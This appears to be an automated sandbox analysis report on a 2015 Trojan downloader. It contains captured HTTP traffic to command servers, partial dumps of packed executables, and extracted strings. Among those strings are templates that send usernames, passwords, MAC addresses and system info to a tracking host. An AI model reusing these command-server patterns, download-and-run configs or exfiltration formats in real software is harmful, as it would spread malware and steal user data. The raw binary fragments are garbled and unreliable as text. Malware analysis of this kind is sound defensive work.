type="x64">.....<file>PtsGPU64.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/PtsGPU64.zip</down>.....<md5>AA9328656593D9D174CC5BDF07687807</md5>.....<param>PtsGPU.exe</param>....</sys>...</item>.. ...<item name="neda,eda,ChannelEda" type="EDA">....<sys type="x86">.....<file>nclound32.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/nclound32.zip</down>.....<md5>41FE0E8A5A889DB45241081868D75407</md5>.....<param&
<<< skipped >>>
GET /m137390001.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx
Date: Fri, 27 Mar 2015 20:46:54 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 462
Last-Modified: Fri, 27 Mar 2015 09:41:55 GMT
ETag: "551525e3-1ce"
Accept-Ranges: bytes
Age: 70720
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>.<UserInfo autoPlayTime="20141130">. <item type="10511">. <MainPageID>sg7844</MainPageID>. <OutGameID/>. <OutGame2ID>100412</OutGame2ID>. <OutGame3ID/>. <SGTPID/>. <eda>108611</eda>. <gda/>. <BlackUrl/>. <f>0</f>. <s>0</s>. <q>1</q>. <c>1</c>. <d>1</d>. <area>dt_one</area>. <ycgg>100412</ycgg>. <cq>1</cq>. <kjqt>300084</kjqt>. <dbt>100412</dbt>. </item>.</UserInfo>.HTTP/1.0 200 OK..Server: nginx..Date: Fri, 27 Mar 2015 20:46:54 GMT..Content-Type: text/xml; charset=utf-8..Content-Length: 462..Last-Modified: Fri, 27 Mar 2015 09:41:55 GMT..ETag: "551525e3-1ce"..Accept-Ranges: bytes..Age: 70720..X-Cache: HIT from ctzjjhs1..Via: 1.0 ctzjjhs1 (squid)..Connection: keep-alive..<?xml version="1.0" encoding="UTF-8"?>.<UserInfo autoPlayTime="20141130">. <item type="10511">. <MainPageID>sg7844</MainPageID>. <OutGameID/>. <OutGame2ID>100412</OutGame2ID>. <OutGame3ID/>. <SGTPID/>. <eda>108611</eda>. <gda/>. <BlackUrl/>. <f>0</f>. <s>0</s>. <q>1</q>. <c>1</c>. <d>1</d>. <area>dt_one</area>. <ycgg>100412</ycgg>.
<<< skipped >>>
GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........HTTP/1.1 200 OK..Date: Mon, 06 Apr 2015 01:53:43 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 4.0.30319..Cache-Control: private..Content-Type: text/html; charset=utf-8..Content-Length: 49..[......]........=37.57.16.189........=.............
GET /updata/adclient/client/szicoad.exe HTTP/1.1
Range: bytes=0-
Unless-Modified-Since: Fri, 27 Mar 2015 18:31:32 GMT
If-Range: "1DDF4CC1188804E8670E9CA6139C2FED"
User-Agent: AutoIt
Host: down04.kuaibu8.com
HTTP/1.1 206 Partial Content
Date: Mon, 06 Apr 2015 01:53:35 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
Content-Range: bytes 0-389557/389558
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71F957EEBB6599ED681
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f..'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O..........#.......... ...`..@....p... ....@..........................@................@.......@.............................. ..............................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....!|..wP......<.......&..S...............F......!g?....*v V3.......$=.G....Q....rF...;w.r.^..
GET /proj/BackEnd.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx
Date: Sun, 05 Apr 2015 05:40:09 GMT
Content-Type: application/octet-stream
Content-Length: 477
Last-Modified: Wed, 25 Mar 2015 02:18:43 GMT
ETag: "55121b03-1dd"
Accept-Ranges: bytes
Age: 72797
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
[config]..run=yes..cudp=19034..sudp=19033..stcp1=19042..stcp2=19048..bguid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045..path=%temp%\downt..seed=AplusFile.bt..extparam=com..[x86]..name=BackEnd32.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd32.zip..md5=2E2642D3D4568793E2699EAE74370D2E..path=%temp%\downt..param=comdhost.exe..[x64]..name=BackEnd64.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd64.zip..md5=C6B9ABFB262D1DD8DD75243165020C08..path=%temp%\downt..param=comdhost.exeHTTP/1.0 200 OK..Server: nginx..Date: Sun, 05 Apr 2015 05:40:09 GMT..Content-Type: application/octet-stream..Content-Length: 477..Last-Modified: Wed, 25 Mar 2015 02:18:43 GMT..ETag: "55121b03-1dd"..Accept-Ranges: bytes..Age: 72797..X-Cache: HIT from ctzjjhs1..Via: 1.0 ctzjjhs1 (squid)..Connection: keep-alive..[config]..run=yes..cudp=19034..sudp=19033..stcp1=19042..stcp2=19048..bguid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045..path=%temp%\downt..seed=AplusFile.bt..extparam=com..[x86]..name=BackEnd32.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd32.zip..md5=2E2642D3D4568793E2699EAE74370D2E..path=%temp%\downt..param=comdhost.exe..[x64]..name=BackEnd64.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd64.zip..md5=C6B9ABFB262D1DD8DD75243165020C08..path=%temp%\downt..param=comdhost.exe..
<<< skipped >>>
GET /dyndns/getip HTTP/1.1
User-Agent: APlus
Host: VVV.3322.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Apr 2015 01:53:50 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Content-Type: text/plain; charset=utf-8
d..37.57.16.189...0..HTTP/1.1 200 OK..Server: nginx..Date: Mon, 06 Apr 2015 01:53:50 GMT..Content-Type: application/octet-stream..Transfer-Encoding: chunked..Content-Type: text/plain; charset=utf-8..d..37.57.16.189...0..
GET /proj/BackEnd32.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx
Date: Wed, 25 Mar 2015 02:30:13 GMT
Content-Type: application/zip
Content-Length: 171307
Last-Modified: Wed, 25 Mar 2015 02:16:54 GMT
ETag: "55121a96-29d2b"
Accept-Ranges: bytes
Age: 3001
X-Cache: HIT from ctzjtzs1
Via: 1.0 ctzjtzs1 (squid)
Connection: keep-alive
PK.........TxF5..y}...........comdhost.exe..}|T..8..S.K...,.5B..h...5q...n...} .($A.4Mm...P..7.{3\.-.M[.[[..J[..0V.,... ..b.j.R.....!..~...w.y..y.>..^?4{..;...3g.93s....u..F.1._<..4h..B...G.o.....l.........<..;K../....<...o=.... .....K..g......x.......{.......7......y..:.3.>c.Y.j.z^.d.e.N........k..Nv]9....bW.w.U.p....k4..)....25..F....k4E:......i5.3.,.q*.=..h...z.,.3.].....kXF...&.....:^D.^S`.......7j4...4Y....?.....Y..z........h..#.u.W~6@.{.c....h..R...........y6Mc........{@....,].-.gu.:kR... ..<... ...9.4w p.. .z.....o.E...(..G..j...2..#....J_...vA......>..@. .w.x^%....%m......$.....X.T.E..4s...O.jH'....$..^X.....w...Mu..C....b...}...XW?:...~.>l?.v^(.d....Z..7'...'.....4.....)..X.....&Q...}..c.rZ...._Z.RMg..<.8....`=.|Po...,.Y...........o....i...}z......k....cS......O.4.35.p85\...t.f}..........~.6"~.xRa...."t{r..=..pj0jp..e=...g....g../...y>/...~oc....t.k?......?1..K....vh..`..h]....={%.'....9U#.......=b7...]..Mt.....&....h@.7..Ke../-~.I..sF..S..........C!.2.c.SB...H.%.m^b .1.i..-.Oz$>...vx.m.f&..m>.%..:,..4....9...,...Z.W...i..-..z.0..>Z..$........d..1..xFZm.v...!....iF........s..F..2.I.\.<5.r...._.S.....KK..v#&f.$.. .#]..b.l..l.....i...epS........Z.;..l./.........S-KtdH...d.T.v..gJu....PIs%<).~.>....Vl..X...OI...r.G:...h.k<G......_1.......B...]......../......f.?........A .._=S.....b....a.X.a11p...4.}..0C...R....|.8.o......a.E..x.P....@F >.7x.Ym...G.v.............z.(.Hf.-7...0..F..l."a......S..*,,.<.2.. ....._6~R....%..=..@#=.I.FR#.!...W.,3...........
<<< skipped >>>
GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:44 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E728B7EB447F466C7227
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc916.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startupdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.kuaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adclient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.exe..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yileyou/yileyou.dll..
GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:33 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71D51235893A88ED225
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f..'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O..........#.......... ...`..@....p... ....@..........................@................@.......@.............................. ..............................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....!|..wP......<.......&..S...............F......!g?....*v V3.......$=.G....Q....rF...;w.r.^.G...awVW4.....K...........S&......,.I'....<..P...|C|(v..#.\...DQ.`..`.~.._.L.^...._....lp(...V...=-.i..0.^.h....7..L,o...U..3.........&8...J.tNh..P..\..R.....'....................X<Qj.........;.c.`\....tH..]9.....F$S3.;.`..9...,.^$.^0.4...78.^.[o>.E..M..U.W.....}.PQR..._]...?...S.]..f..V;.7.......t....i...&....r.6...O.r)...v{.@....*...........;=....|.K^.u..VRWS....f.v^[....E.h..JC.....<.l.1a....@.i8....._...r......G,..w....y.$.
<<< skipped >>>
GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........HTTP/1.1 200 OK..Date: Mon, 06 Apr 2015 01:53:22 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 4.0.30319..Cache-Control: private..Content-Type: text/html; charset=utf-8..Content-Length: 49..[......]........=37.57.16.189........=.............
GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:25 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E715A97F0D894E6C866D
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc916.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startupdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.kuaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adclient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.exe..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yileyou/yileyou.dllHTTP/1.1 200 OK..Date: Mon, 06 Apr 2015 01:53:25 GMT..Content-Type: text/plain..Content-Length: 861..Connection: close..Accept-Ranges: bytes..ETag: "5F518A33E3525F232868CB7B8D966762"..Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT..Server: AliyunOSS..x-oss-request-id: 5521E715A97F0D894E6C866D..[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc916.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=hXXp://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startupdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04.kuaibu8.com..04=down04.kuaibu8.com..0
<<< skipped >>>
GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:36 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E720CF90B15A28922240
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f..'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O..........#.......... ...`..@....p... ....@..........................@................@.......@.............................. ..............................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....!|..wP......<.......&..S...............F......!g?....*v V3.......$=.G....Q....rF...;w.r.^.G...awVW4.....K...........S&......,.I'....<..P...|C|(v..#.\...DQ.`..`.~.._.L.^...._....lp(...V...=-.i..0.^.h....7..L,o...U..3.........&8...J.tNh..P..\..R.....'....................X<Qj.........;.c.`\....tH..]9.....F$S3.;.`..9...,.^$.^0.4...78.^.[o>.E..M..U.W.....}.PQR..._]...?...S.]..f..V;.7.......t....i...&....r.6...O.r)...v{.@....*...........;=....|.K^.u..VRWS....f.v^[....E.h..JC.....<.l.1a....@.i8....._...r......G,..w....y.$.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
bv.exe_464:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
CCmdTarget
CCmdTarget
%*.*f
%*.*f
commctrl_DragListMsg
commctrl_DragListMsg
COMCTL32.DLL
COMCTL32.DLL
CNotSupportedException
CNotSupportedException
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
ole32.dll
ole32.dll
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
WS2_32.dll
WS2_32.dll
WinExec
WinExec
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
GDI32.dll
GDI32.dll
comdlg32.dll
comdlg32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
OLEPRO32.DLL
OLEPRO32.DLL
OLEAUT32.dll
OLEAUT32.dll
iphlpapi.dll
iphlpapi.dll
%s\%s
%s\%s
explorer.exe
explorer.exe
wbz1.exe
wbz1.exe
byteFirewall.dat
byteFirewall.dat
x-x-x-x-x-x
x-x-x-x-x-x
3.3.3.3
3.3.3.3
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
.PAVCFileException@@
zcÃ
zcÃ
windows
windows
KERNEL32.DLL
KERNEL32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bv.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bv.exe
h.rdata
h.rdata
H.data
H.data
.pdata
.pdata
.reloc
.reloc
TransportAddress
TransportAddress
%d.%d.%d.%d
%d.%d.%d.%d
e:\bvaccdriver\tdi_hook_demo0828\objfre_win7_amd64\amd64\tdihook.pdb
e:\bvaccdriver\tdi_hook_demo0828\objfre_win7_amd64\amd64\tdihook.pdb
ntoskrnl.exe
ntoskrnl.exe
TDI.SYS
TDI.SYS
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
e:\bvaccdriver\tdi_hook_demo0828\objfre_wxp_x86\i386\tdihook.pdb
e:\bvaccdriver\tdi_hook_demo0828\objfre_wxp_x86\i386\tdihook.pdb
HAL.dll
HAL.dll
1, 0, 0, 1
1, 0, 0, 1
ByteFirewall.EXE
ByteFirewall.EXE
\Device\Udp
\Device\Udp
\Device\Tcp
\Device\Tcp
\Driver\Tcpip
\Driver\Tcpip
(*.*)
(*.*)
comdhost.exe_424:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
X;
X;
%s>
%s>
%s='%s'
%s='%s'
%s="%s"
%s="%s"
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
operator
operator
GetProcessWindowStation
GetProcessWindowStation
tongji.wangbax.cn
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
VVV.3322.org
msvcr32.dll
msvcr32.dll
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%s%s%s
%s%s%s
127.0.0.1
127.0.0.1
awangba.com
awangba.com
user=%s&id=%s&pw=%s&type=%s&run=%s&ip=%s&mac=%s&sysinfo=%s&client=e.%d
user=%s&id=%s&pw=%s&type=%s&run=%s&ip=%s&mac=%s&sysinfo=%s&client=e.%d
user=%s&id=%s&pw=%s&type=%s&ip=%s&mac=%s&sysinfo=%s&client=e
user=%s&id=%s&pw=%s&type=%s&ip=%s&mac=%s&sysinfo=%s&client=e
ProjPack.xml
ProjPack.xml
hXXp://domain.awangba.com.cn/config.xml
hXXp://domain.awangba.com.cn/config.xml
plusconfig.xml
plusconfig.xml
cudp
cudp
sudp
sudp
AplusFile.bt
AplusFile.bt
stcp1
stcp1
stcp2
stcp2
00:00:00:00:00:00
00:00:00:00:00:00
X:X:X:X:X:X
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 R2
M-d-d%s
M-d-d%s
\\.\pipe\wangbax
\\.\pipe\wangbax
Z:\svn\trunk\Develop\APlusClient\Win32\Release\BackEnd32.pdb
Z:\svn\trunk\Develop\APlusClient\Win32\Release\BackEnd32.pdb
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
DisconnectNamedPipe
DisconnectNamedPipe
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExA
RegEnumKeyExA
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
SHLWAPI.dll
SHLWAPI.dll
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
WININET.dll
WININET.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
zcÃ
zcÃ
.?AVCMd5@@
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt
F3450EDC-EAF6-BCE5-BEC8-25CF003FE045
F3450EDC-EAF6-BCE5-BEC8-25CF003FE045
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\AplusFile.bt
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\AplusFile.bt
1$1)1014191
1$1)1014191
8,888\8|8
8,888\8|8
9 9$9,9@9\9`9
9 9$9,9@9\9`9
nKERNEL32.DLL
nKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
1.0.0.2
1.0.0.2
BackEnd.exe
BackEnd.exe
1.120.1.3241
1.120.1.3241
brocount.exe_1764:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
operator
operator
GetProcessWindowStation
GetProcessWindowStation
tongji.wangbax.cn
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
awangba.com
awangba.com
id=%s&mac=%s&brower=%s&user=%s&pw=%s
id=%s&mac=%s&brower=%s&user=%s&pw=%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
X:X:X:X:X:X
X:X:X:X:X:X
M-d-d%s
M-d-d%s
Z:\svn\trunk\Develop\APlusClient\Release\CountBro.pdb
Z:\svn\trunk\Develop\APlusClient\Release\CountBro.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExA
RegEnumKeyExA
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
iexplore.exe
iexplore.exe
360se.exe
360se.exe
360chrome.exe
360chrome.exe
2345Explorer.exe
2345Explorer.exe
QQBrowser.exe
QQBrowser.exe
TTraveler.exe
TTraveler.exe
f1browser.exe
f1browser.exe
Tango3.exe
Tango3.exe
2291Browser.exe
2291Browser.exe
chrome.exe
chrome.exe
firefox.exe
firefox.exe
baidubrowser.exe
baidubrowser.exe
SogouExplorer.exe
SogouExplorer.exe
miniie.exe
miniie.exe
win-ie.exe
win-ie.exe
TheWorld.exe
TheWorld.exe
twchrome.exe
twchrome.exe
.?AVCMd5@@
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe
nKERNEL32.DLL
nKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
1.0.0.1
1.0.0.1
1.147.1.3131
1.147.1.3131
svchost.exe_1284:
.text
.text
